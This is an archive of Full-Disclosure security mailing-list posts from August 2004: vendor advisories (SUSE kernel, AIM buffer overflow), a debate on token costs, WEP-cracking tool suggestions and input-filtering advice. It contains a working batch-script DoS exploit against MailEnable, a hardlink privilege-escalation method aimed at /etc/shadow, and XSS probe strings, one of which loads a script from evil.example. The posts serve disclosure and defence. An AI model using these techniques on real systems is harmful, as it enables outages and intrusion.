[Full-Disclosure] SUSE Security Announcement: kernel (SUSE-SA:2004:024)
SUSE Security Announcement

Package:              kernel
Announcement-ID:      SUSE-SA:2004:024
Date:                 Monday, Aug 9th 2004 08:50 MEST
Affected products:    8.0, 8.1, 8.2, 9.0, 9.1
                      SUSE Linux Database Server
                      SUSE eMail Server III, 3.1
                      SUSE Linux Enterprise Server 7, 8, 9
                      SUSE Linux Firewall on CD/Admin host
                      SUSE Linux Connectivity Server
                      SUSE Linux Office Server
Vulnerability Type:   local privilege escalation
Severity (1-10):      6
SUSE default package: yes
Cross References:     CAN-2004-0415

Content of this advisory:
1) security vulnerability resolved:
   - race condition in file offset pointer handling
   problem description
2) solution/workaround
3) special instructions and notes
4) package location and checksums
5) pending vulnerabilities, solutions, workarounds:
   - gaim
   - mozilla/firebird
6) standard appendix (further information)

1) problem description, brief discussion

Paul Starzetz from iSEC informed us about a race condition in the 64bit file offset handling code of the kernel. The file offset pointer (f_pos) is changed during reading, writing, and seeking through a file to point to the current position in a file. The Linux kernel offers a 32bit and a 64bit API. Unfortunately the value conversion between these two APIs, as well as the access to the f_pos pointer, is defective. These bugs can be abused (mostly with entries in /proc) by a local attacker to gain access to uninitialized kernel memory, which may contain sensitive information (root password and alike).

Additionally, a bug in the implementation of chown(2) for updating inode times, and a denial-of-service condition that can occur while handling signals, were fixed. (Please note that the latter patch can cause problems by leaving zombie processes. We are working on a fix.)

2) solution/workaround

There is no workaround known for this problem. Please install the update package for the kernel on your system.

3) special instructions and notes

SPECIAL INSTALL INSTRUCTIONS:

The following paragraphs will guide you through the installation process in a step-by-step fashion. The character sequence marks the beginning of a new paragraph. In some cases, the steps outlined in a particular paragraph may or may not be applicable to your situation. Therefore, please make sure to read through all of the steps below before attempting any of these procedures. All of the commands that need to be executed are required to be run as the superuser (root). Each step relies on the steps before it to complete successfully.

Note: The update packages for the SuSE Linux Enterprise Server 7 (SLES7) are being tested at the moment and will be published as soon as possible.

Step 1: Determine the needed kernel type

Please use the following command to find the kernel type that is installed on your system:

    rpm -qf /boot/vmlinuz

Following are the possible kernel types (disregard the version and build number following the name, separated by the - character):

    k_deflt     # default kernel, good for most systems.
    k_i386      # kernel for older processors and chipsets
    k_athlon    # kernel made specifically for AMD Athlon(tm) family processors
    k_psmp      # kernel for Pentium-I dual processor systems
    k_smp       # kernel for SMP systems (Pentium-II and above)
    k_smp4G     # kernel for SMP systems which supports a maximum of 4G of RAM
    kernel-64k-pagesize
    kernel-bigsmp
    kernel-default
    kernel-smp

Step 2: Download the package for your system

Please download the kernel RPM package for your distribution with the name as indicated by Step 1. The list of all kernel rpm packages is appended below.

Note: The kernel-source package does not contain a binary kernel in bootable form. Instead, it contains the sources that the binary kernel rpm packages are created from. It can be used by administrators who have decided to build their own kernel. Since the kernel-source.rpm is an installable (compiled) package that contains sources for the linux kernel, it is not the source RPM for the kernel RPM binary packages. The kernel RPM binary packages for the distributions can be found at the locations below
Re: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
I am going to start singing that old song from some movie made before my time, "Nice Work if you can get it, and you can get it if you try..." Of course I think the crooner was crooning about romance; easier to convince some human that it is worth some bucks to get rather than random numbers, which are everywhere if you look, eh?, yeah, right? ;) said with a sneer (giggle ;)

More seriously, I was looking at RFID systems vis a vis the privacy worries of such and such systems, and I wondered what would a store, or a library, want with something that with effort could tell you everywhere it has been. Now I admit when I have misplaced two books I really some days want a "magic wand" to find them. The other problem is I have seen my local library try to handle its security concerns, and some things seem reasonable to me, many seem a bit overcautious after being burnt. I know the legends involved; when I mention I am trying to solve some problem I am told I just need an 11 year old to do it for me, as if they are pixies with magic power. Getting your staff which is dedicated in the case of the library, but which has several techo-questioning? (giggle, trying to be polite) people on it, but which is sensitive to privacy concerns. Versus the people at the Long's Drug Chain (medium sized US drug chain) where there is a big taa-doo at the register to check everything out whenever I bring in an item that I was overcharged $3.00 for. I look at some of the more elaborate security systems that merchants have been sold as being good and I am ready, at least emotionally, to join the "number of the beast" worry-warts. I hope the Long's main office, when presented with a new security plan, looks at it and laughs and says it is too expensive.

But I am sure that someone has told some ubermanager far away from Watsonville, California that "Your shrinkage problems will disappear if you install our $5 megabuck system, which if you look at it per item is not that expensive." Of course the guy selling it is far distant again from the techies who produced it to earn their daily bread to pay for living in the $1000US/mo apartment. The salescreature thinks the idea of selling random numbers at $25.00 for a couple hundred is a good thing. I mean they say: "Those are magic numbers; they are produced by complicated software written by people who are so bright." You get my drift.

Have Fun, Sends Steve

P.S. The "they lock when you take them beyond the parking lot" shopping carts have become great playtoys for kids in the neighborhood who like to overpower them and hear them beep as they drag it along like a recalcitrant puppy.

Curt Sampson wrote:

> On Fri, 6 Aug 2004, Dana Hudes wrote:
>
> > On Fri, 6 Aug 2004 [EMAIL PROTECTED] wrote:
> >
> > > RSA has been doing PIN cards for ages...I don't get the hangup on SmartCards vs "plain old" something you have/something you know two factor
> >
> > as I understand it a "PIN Card" is a card with an EEPROM on it that contains a PIN. Possibly encrypted but its the same effect as any other file. The host decides if the PIN matches.
>
> The RSA SecurID system is a hardware token that generates a new number every minute using a sequence generator and a seed that is effectively a shared secret between the hardware token and the authentication server. You take the current minute's number and, usually, some other authentication information (such as a PIN or password) and pass both of those back to the authentication server, which will then determine whether the authentication is valid. It's a bit expensive, but it works ok.
>
> RSA also sells "software tokens" which are the same thing, but as software that runs on a PC or handheld. This is particularly expensive for what you get, since the token is easily copied from the device, with no indication that it's been stolen. (At least with the hardware tokens you know when it's been stolen.) And it's also quite expensive: they charge $25-$80 for a "1 year" software token.
>
> I wish I had the gall to sell large quantities of 128 bit random numbers for $25 each.
>
> cjs
RE: [Full-Disclosure] SP is here (soon) !
Got a copy of it last night.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of joe
Sent: Friday, August 06, 2004 7:04 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] SP is here (soon) !

XP SP2 Final is up on MSDN Downloads for the MSDN Subscribers. English and German as of right now.

joe

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Marc Rees
Sent: Friday, August 06, 2004 12:59 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] SP is here (soon) !

Go to: http://www.microsoft.com/windowsxp/downloads/updates/sp2/cdorder/en_us/default810.mspx

I'm French. So I select France in the country section. And select Windows XP SP French CD in the language section. Last, click on Order now.

    Microsoft VBScript compilation error '800a03f6' Expected 'End' ?, line 0'

Someone needs SP3 ;)

Marc Rees
www.acbm.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] DOS@MEHTTPS
Thanks,

A hotfix for this bug is available from: http://www.mailenable.com/hotfix

Peter Fregon
MailEnable Pty. Ltd.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of CoolICE
Sent: Monday, 2 August 2004 5:19 PM
To: suggest
Cc: bugtraq; full-disclosure; list
Subject: [Full-Disclosure] [EMAIL PROTECTED]

:Application: MailEnable Professional HTTPMail
:Vendors: http://www.mailenable.com/
:Version: 1.19
:Platforms: Windows
:Bug: D.O.S
:Date: 2004-07-30
:Author: CoolICE
:E_mail: CoolICE#China.com

    @echo off
    ;if '%1'=='' echo Usage:%0 target [port]goto :eof
    ;set PORT=8080
    ;if not '%2'=='' set PORT=%2
    ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exegoto :eof
    ;DEBUG %~s0
    ;GOTO :run
    e 100 GET / HTTP/1.0 0D 0A Content-Length: [EMAIL PROTECTED]0x64
    f 120 183 39
    e 184 0d 0a 0d 0a
    rcx
    8c
    nhttp.tmp
    w
    q
    :run
    nc %1 %PORT% http.tmp
    del http.tmp
Re: [Full-Disclosure] waa waa (was Finally the truth slips out)
[EMAIL PROTECTED] wrote:

> On Fri, 06 Aug 2004 15:39:45 CDT, John Creegan [EMAIL PROTECTED] said:
>
> > I thought this list was originally meant to focus primarily on computer hardware/software types of security issues. Malware, discovered exploitables, etc
>
> OK, you need a tie-in to computers? Go read up on CALEA and friends, and remember that just because the Clipper chip got shot down doesn't mean they won't try again

I guess if that's the case (limiting this list to exploits and such), we should then ban talking about social engineering from the list. And everyone knows that that has *nothing* to do with security! :) (note the sarcasm)

-Barry
[Full-Disclosure] WEP utilities
I am trying to find a WEP utility for intrusion detection/network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tools in Linux. What I am looking for is any tools that will do WEP decryption as well as packet sniffing on WLAN. I need this utility to work under Windows (any version). Does anyone know of a utility that meets these criteria?

Thanks,

Thomas Simmons
Server Support
RE: [Full-Disclosure] WEP utilities
I would guess you are doing this for security purposes. If you are going to test things to stay secure, then test what would be used against you (most likely).

What is KNOPPIX?

KNOPPIX is a bootable CD with a collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a Linux demo, educational CD, rescue system, or adapted and used as a platform for commercial software product demos. It is not necessary to install anything on a hard disk. Due to on-the-fly decompression, the CD can have up to 2 GB of executable software installed on it.

www.knoppix.com
www.knoppix-std.org
http://www.moser-informatik.ch/

Using a Linux bootable CD will help you learn Linux without knowing how to configure it. Try Airsnort (on the fly WEP decryption), Kismet for wireless detection, Ethereal for packet sniffing. No need to install software; your work computer will be untouched after you are done.

Note: I had a Cisco error when running Kismet with Knoppix 3.4. 3.3 worked great and I still use it. The newest version of 3.4 may have fixed the issue however.

-Todd

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Simmons, Thomas
Sent: Monday, August 09, 2004 7:59 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] WEP utilities

I am trying to find a WEP utility for intrusion detection/network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tools in Linux. What I am looking for is any tools that will do WEP decryption as well as packet sniffing on WLAN. I need this utility to work under Windows (any version). Does anyone know of a utility that meets these criteria?

Thanks,

Thomas Simmons
Server Support
RE: [Full-Disclosure] WEP utilities
Try airmagnet (www.airmagnet.com). Commercial version, but very good... You have an option to give it the WEP key, in order to let it do the job.. Don't know free products for this (out of the box), but you could probably try to have some different tools working together (Snort, etc..)

Regards,
Max

-Original Message-
From: Simmons, Thomas [mailto:[EMAIL PROTECTED]
Sent: Monday, 9 August 2004 14:59
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] WEP utilities

I am trying to find a WEP utility for intrusion detection/network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tools in Linux. What I am looking for is any tools that will do WEP decryption as well as packet sniffing on WLAN. I need this utility to work under Windows (any version). Does anyone know of a utility that meets these criteria?

Thanks,

Thomas Simmons
Server Support

Visit our website! http://www.nbb.be

"DISCLAIMER: The content of this e-mail message should not be construed as binding on the part of the National Bank of Belgium (NBB) unless otherwise and previously stated. The opinions expressed in this message are solely those of the author and do not necessarily reflect NBB viewpoints, particularly when the content of this message, or part thereof, is private by nature or does not fall within the professional scope of its author."
RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
Why yes Lyal, it is... Mea culpa...but:

TCO is not as simple as you lay it out for your smartcard either. We were apples-to-apples there for a bit...but, let's drive into your purported TCO costs on the smartcard there, shall we?

First, you seem to have no back-end administration (this is a self-maintained model you have? please explain how that works) to deal with lost cards, forgotten PINs, failed/trashed hardware, etc. Additionally, in any reasonably sized enterprise, you'll need resources allocated to handle new hires, machine moves, upgrades, etc. If you intend to cost-burden the existing staff that's fine...but it's still there.

System integration? You're telling me your smartcard system has none? Unless you just have your system doing authentications at boot, you most certainly do have integration. If you intend to secure some environments more than others, like, at the application level, you have the same integration issues with either system (and probably worse with yours, as RSA has been banging around at this a long time, and the list of apps that RSA can bolt onto is extensive)...so let's call that a wash too.

So let's jack your per-seat price up accordingly, ok? But you know, tell you what, let's leave your TCO where it is and bear in mind that I was responding to a $1000/seat number from you, not the $210 + consultant you just tossed back. (Sorry if this sounds sarcastic, but you've changed the parameters and omitted factors as important to the TCO as I did, and then lowered your number just to sound more cost-effective...not cricket, old boy)

Now, let's take a look at a typical RSA solution, street prices, for 250 users, and remember that the cost scales down from here:

    server software (w/24x7 support), about                          $20,000 US
    server hardware (trivial, but let's toss a couple of blades
      at it just for fun)                                            $10,000 US
    Cards (generous here, very) @ $70.00 US x 250                    $17,500 US

I'm going to burden my existing staff with back-end support and admin, just like you did. So, we have a per-seat, fully burdened TCO of $190/seat.

In a mobile workforce there are additional benefits as well, Lyal...like not having laptop users lug around a card reader that they have to a) remember, and b) plug in every time they want to use the PC. You may well respond by saying that's trivial...but then, you aren't the user, he won't say that. The easier we can make his use of secure products and systems the more likely he is to use them, would you agree?

Bart Lansing
Manager, Desktop Services
Kohl's IT

Lyal Collins [EMAIL PROTECTED] wrote on 08/08/2004 02:32:15 AM:

> $10 smartcard
> $200 reader (with pinpad)
> $500-$1000 to have someone (at consultant rates) spend up to a day installing the necessary proprietary drivers, install batteries (or AC adapter/plugpacks, because smartcards can require more power than a serial port, particularly when just inserted) and training the (typically non-techo) user on how to use the PINpad.
> Then 2-3 years later, repeating the whole process again because they upgraded/rebuilt their machine, and can't get the proprietary drivers to talk to the proprietary reader w/PINpad, or to replace the batteries etc.
>
> One-time tokens are so much cheaper, at $120-$150 AUD (about US$80) plus $10-$25k for the server software, and a bunch of people time distributing the right token to the right person, plus system integration etc.
>
> Sorry if this sounds sarcastic, but the cost of ownership issue is way more complex than just the device unit cost.
>
> Lyal
>
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Sent: Friday, 6 August 2004 11:54 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards
>
> Guys...
>
> RSA has been doing PIN cards for ages...I don't get the hangup on SmartCards vs plain old something you have/something you know two factor
>
> http://www.rsasecurity.com/node.asp?id=1311
>
> Cost of entry/ownership is nothing remotely close to the $1000 you mention Lyal...in fact, it's under 1/10 of that on a per seat basis...
>
> Why get hung up on it being a smartcard, when you can do two factor with a much lower entry cost and do it, frankly, easier?
>
> Bart Lansing
> Manager, Desktop Services
> Kohl's IT
>
> [EMAIL PROTECTED] wrote on 08/05/2004 08:45:33 PM:
>
> > This exposure, of PIN compromise, is generic in all smartcard products today, unless a dedicated PINpad or biometric-sensor equipped readers are used - putting cost of ownership towards $1000 in some cases. PC/SC doesn't help - as a data interface API spec, it excludes human interface aspects. STIP (Small Terminal Interoperability Platform at www.stip.org) moves in this direction, but has evolved into many variants to interoperate with proprietary vendors and proprietary industry standards. The
Re: [Full-Disclosure] WEP utilities
Simmons, Thomas wrote:

> I am trying to find a WEP utility for intrusion detection/network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tools in Linux. What I am looking for is any tools that will do WEP decryption as well as packet sniffing on WLAN. I need this utility to work under Windows (any version). Does anyone know of a utility that meets these criteria?
>
> Thanks,
>
> Thomas Simmons
> Server Support

There are attempts to port airsnort onto the windoze platform: http://airsnort.shmoo.com/

Joshua has also released a windoze version of his As-leap, if you are into Cisco LEAP cracking.

Apart from that, there are several commercial tools that can partially do the stuff you are enquiring about.

If you find Linux too difficult to use, why not give Mac a try? ;) Kismac is pretty good and has a nice and fluffy GUI too.

--
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web:    http://www.arhont.com
        http://www.wi-foo.com
e-mail: [EMAIL PROTECTED]

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0x4F3608F7
PGP: Server - keyserver.pgp.com
Re: [Full-Disclosure] Re: Anyone know IBM's security address? + Google Hack
* Aaron Gray:

> It turns out I was going about the process of vulnerability notification all wrong. I should have gone to the United States Computer Emergency Readiness Team to report them.
>
> The US-CERT home page provides an email address [EMAIL PROTECTED] for reporting vulnerabilities. If you use it, you will receive more detailed instructions on how to complete this form.

Before submitting *anything* to CERT/CC, be sure to review their information sharing policies. Last time I checked, their documented policy was to share _everything_ with paying customers unless you explicitly requested that information is dealt with on a need-to-know basis.
[Full-Disclosure] iDEFENSE Security Advisory 08.09.04: AOL Instant Messenger aim:goaway URI Handler Buffer Overflow Vulnerability
AOL Instant Messenger aim:goaway URI Handler Buffer Overflow Vulnerability

iDEFENSE Security Advisory 08.09.04
www.idefense.com/application/poi/display?id=121type=vulnerabilities
August 9, 2004

I. BACKGROUND

AOL Instant Messenger is an instant messaging client developed by America Online.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in America Online Inc.'s Instant Messenger (AIM) can allow attackers to execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds checking on user-supplied values passed to the 'goaway' function of the AOL Instant Messenger 'aim:' URI handler. A long message buffer will overwrite values stored on the stack and may be used to overwrite a Structured Exception Handler (SEH) pointer as shown below:

    0012E634   45454545
    0012E638   46464646
    0012E63C   47474747
    0012E640   484808EB   Pointer to next SEH record
    0012E644   41414141   SE handler

Control of the SEH pointer allows for eventual execution of arbitrary code.

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under the privileges of the user that instantiated the vulnerable version of AOL Instant Messenger. While AIM 5.5 and later has been compiled with Microsoft Visual Studio .NET 2003 and incorporates stack protection, iDEFENSE has confirmed that exploitation is still possible.

IV. DETECTION

iDEFENSE has confirmed that AOL Instant Messenger, version 5.5, is vulnerable. Previous versions are also suspected as vulnerable.

V. WORKAROUND

Exploitation of 'aim:' URI handler vulnerabilities can be prevented by removing the following key from the registry:

    HKEY_CLASSES_ROOT\aim

The following script can be saved to a file with the .vbs extension and executed to automate the task of removing the relevant URI handler (the string arguments must be quoted for the script to run):

    ' Removes the aim: URI handler registration (run with administrative rights)
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.RegDelete "HKCR\aim\"

VI. VENDOR RESPONSE

iDEFENSE has been working with AOL since 07/12/2004 regarding this issue to allow the vendor time to implement a patch. However, on 08/09/2004 an advisory was released by Secunia (http://secunia.com/advisories/12198/) as the same issue was discovered by another group of researchers. With the issue now public, iDEFENSE is proceeding with public disclosure.

AOL has provided the following statement:

    iDEFENSE, Inc. reported a buffer overflow vulnerability in all Windows versions of AOL Instant Messenger (AIM). The impact of this vulnerability could potentially allow for an attacker to execute malicious code on Windows platforms. Exploit of this vulnerability requires that an AIM user click on a malicious URL supplied in an instant message or embedded in a web page.

    Affected Products and Applications
    AOL Instant Messenger (AIM) for Windows - All known versions

    Vendor Recommendations
    1. America Online, Inc. recommends that Windows users of AIM upgrade to the latest beta version to be released on August 9, 2004. This new version of AIM addresses the vulnerability described herein and can be obtained via the AOL Instant Messenger portal, www.aim.com.
    2. A workaround provided by iDEFENSE is available until users are able to upgrade to the new beta version.

    Vendor Acknowledgments
    Thanks to Matt Murphy and iDEFENSE, Inc. for their assistance to responsibly address this issue.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2004-0636 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/16/2004  Initial vendor contact
06/16/2004  iDEFENSE clients notified
07/07/2004  Secondary vendor contact
07/12/2004  Initial vendor response
08/09/2004  Coordinated public disclosure

IX. CREDIT

Matt Murphy is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
RE: [Full-Disclosure] WEP utilities
Oh, BTW some wireless cards won't work with these Linux bootable discs. That could be a problem for ya. But if you can get them to work, the last one has over 300 security tools built-in. Both Knoppix and Knoppix STD have Airsnort, Kismet, Ethereal, Ettercap, WEPCrack. Good stuff.

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: Monday, August 09, 2004 8:53 AM
To: 'Simmons, Thomas'; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] WEP utilities

I would guess you are doing this for security purposes. If you are going to test things to stay secure, then test what would be used against you (most likely).

What is KNOPPIX?

KNOPPIX is a bootable CD with a collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a Linux demo, educational CD, rescue system, or adapted and used as a platform for commercial software product demos. It is not necessary to install anything on a hard disk. Due to on-the-fly decompression, the CD can have up to 2 GB of executable software installed on it.

www.knoppix.com
www.knoppix-std.org
http://www.moser-informatik.ch/

Using a Linux bootable CD will help you learn Linux without knowing how to configure it. Try Airsnort (on the fly WEP decryption), Kismet for wireless detection, Ethereal for packet sniffing. No need to install software; your work computer will be untouched after you are done.

Note: I had a Cisco error when running Kismet with Knoppix 3.4. 3.3 worked great and I still use it. The newest version of 3.4 may have fixed the issue however.

-Todd

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Simmons, Thomas
Sent: Monday, August 09, 2004 7:59 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] WEP utilities

I am trying to find a WEP utility for intrusion detection/network probing. I currently do not have Linux deployed or a competent enough grasp of Linux to use tools in Linux. What I am looking for is any tools that will do WEP decryption as well as packet sniffing on WLAN. I need this utility to work under Windows (any version). Does anyone know of a utility that meets these criteria?

Thanks,

Thomas Simmons
Server Support
[Full-Disclosure] List Charter
[Full-Disclosure] Mailing List Charter
John Cartwright [EMAIL PROTECTED] and Len Rose [EMAIL PROTECTED]

Introduction

Purpose
-------
This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.netsys.com. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by Len Rose and John Cartwright.

Subscription Information
------------------------
Subscription/unsubscription may be performed via the HTTP interface located at http://lists.netsys.com/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to [EMAIL PROTECTED]; send the word 'help' in either the message subject or body for details.

Moderation Management
---------------------
The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only; however the administrators may choose to accept submissions from non-members based on individual merit and relevance.

It is expected that the list will be largely self-policing; however in special circumstances (eg spamming, misappropriation) offending members may be removed from the list by the management.

An archive of postings is available at http://lists.netsys.com/pipermail/full-disclosure/

Acceptable Content
------------------
Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

Posting Guidelines
------------------
The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list.

Quoting should not exceed that which is necessary to convey context; this is especially relevant to members subscribed to the digested version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected.

Members may post to the list by emailing [EMAIL PROTECTED]. Do not send subscription/unsubscription mails to this address; use the -request address mentioned above.

Charter Additions/Changes
-------------------------
The list charter will be published at http://lists.netsys.com/full-disclosure-charter.html

In addition, the charter will be posted monthly to the list by the management.

Alterations will be made after consultation with list members and a consensus has been reached.
Re: [Full-Disclosure] Security hole in Confixx backup script
Hi, * Dirk Pirschel wrote on Mon, 02 Aug 2004 at 13:00 +0200: A user might use the restore function to change the ownership of target files to his own. The restore script runs with root privileges. It unpacks the archive, and then executes chown -R $user in the destination directory ($HOME/html or $HOME/files). Before running the restore script, an attacker can make hardlinks to files not owned by himself. The ownership of these files will be changed. On some badly administered systems there is only one disk partition, so it is possible to make a hardlink to /etc/shadow within $HOME. -Dirk -- Linux - Life is too short for reboots pgpk15yAdCYTk.pgp Description: PGP signature
Re: [Full-Disclosure] [anti-XSS]about CERT/CC:malicious_code_mitigation
On Sat, 07 Aug 2004 06:25:00 -, bitlance winter said: #! The first function takes the negative approach. #! Use a list of bad characters to filter the data sub FilterNeg { local( $fd ) = @_; $fd =~ s/['\%\;\)\(\\+]//g; return( $fd ) ; } *BZZT!!* Wrong. Don't do this in production code, because... I have understood that bad characters are ' % ; ) ( + If it turns out that * (asterisk) is a bad character, you're screwed. If it turns out that *any other* character is bad, you're screwed. The *proper* way to do the filtering is to *remove* *all* characters not known to be good. Something like: $fd =~ s/[^-_ a-zA-Z0-9]//g; Only pass alphabetic, numeric, space, hyphen, and underscore. Add other characters *only* if you can show they are *not* a problem. pgpM0b6nejVGc.pgp Description: PGP signature
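The point made in this reply, shown as an added example (not code from the original post or from the CERT document it discusses): both filters from the quoted Perl, transcribed into Python, run over a few constructed probe strings. The blacklist passes a complete script tag untouched because none of its seven "bad" characters occur in it; the whitelist strips everything it does not know to be safe. The probe strings and the reject-instead-of-strip helper are assumptions added for the demo.

```python
import re

# The two filters from the thread, transcribed from the quoted Perl into Python.
# Negative (blacklist) approach: strip a fixed list of "bad" characters.
BAD_CHARS = re.compile(r"['%;)(\\+]")

# Positive (whitelist) approach: strip everything that is not known-good
# (letters, digits, space, hyphen, underscore).
NOT_ALLOWED = re.compile(r"[^-_ a-zA-Z0-9]")


def filter_neg(value: str) -> str:
    """Remove ' % ; ) ( \\ + and hope nothing else is dangerous."""
    return BAD_CHARS.sub("", value)


def filter_pos(value: str) -> str:
    """Keep only letters, digits, space, hyphen and underscore."""
    return NOT_ALLOWED.sub("", value)


def is_allowed(value: str) -> bool:
    """Reject-instead-of-strip variant (added here, not in the thread):
    True only if every character is on the allow list. Silently deleting
    characters changes the caller's data; refusing the input is usually the
    better contract for a validator."""
    return NOT_ALLOWED.search(value) is None


# Constructed probes, not taken from the original post.
PROBES = [
    "john_doe-42",                                # benign
    "O'Brien (admin); DROP TABLE users",          # the characters the blacklist knows about
    "<script src=//evil.example/x.js></script>",  # contains no blacklisted character at all
    "<img src=x onerror=alert`1`>",               # backticks are not on the list either
]


def compare(probes=PROBES):
    """Run both filters over the probes; returns (probe, blacklist_result, whitelist_result)."""
    return [(p, filter_neg(p), filter_pos(p)) for p in probes]


if __name__ == "__main__":
    for probe, neg, pos in compare():
        print(f"{probe!r}\n  blacklist -> {neg!r}\n  whitelist -> {pos!r}")
```

Running it shows the script tag surviving `filter_neg` byte for byte, which is the "you're screwed" case above; `filter_pos` reduces it to harmless letters.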
Re: [Full-Disclosure] waa waa (was Finally the truth slips out)
Appointed? If you do not believe in the U.S. constitution and the supreme court then I could see how one might suggest that Mr. Bush was appointed. If you do believe in it then you must know that his appointment was the only legal solution to the issue. Many major papers investigated the vote counting in FL and they all concluded that Mr. Bush did win if the votes were counted correctly. Never mind the thousands of military votes the Dems had thrown out which were legal. Come on people. Do your research if you are going to try and make a point. Jason wrote: I think you are just upset because it hurts your Texan Pride that the best representative of the Lone Star State is an internationally recognized tool that was effectively appointed to office. How much better would the international perception of a Texan be without that appointment? __ Do you Yahoo!? Yahoo! Mail - You care about security. So do we. http://promotions.yahoo.com/new_mail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
http://isc.sans.org/ http://www.virustotal.com/xhtml/index_en.html -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 3:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
